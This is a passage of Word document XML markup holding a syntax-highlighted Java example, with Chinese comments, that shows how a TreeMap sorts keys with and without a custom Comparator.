              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> main(String[] </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>args</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>不指定排序器</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        TreeMap&lt;String, String&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>treeMap1</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> TreeMap&lt;String, String&gt;();  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>treeMap1</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.put(</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"2"</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">);  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>treeMap1</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.put(</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"b"</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">);  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>treeMap1</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.put(</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">);  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>treeMap1</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.put(</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"a"</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">);  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        System.</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>out</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.println(</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"treeMap1="</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>treeMap1</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">);  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>指定排序器</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        TreeMap&lt;String, String&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>treeMap2</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> TreeMap&lt;String, String&gt;(</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>Comparator</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;String&gt;(){  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">/* </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">             * </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
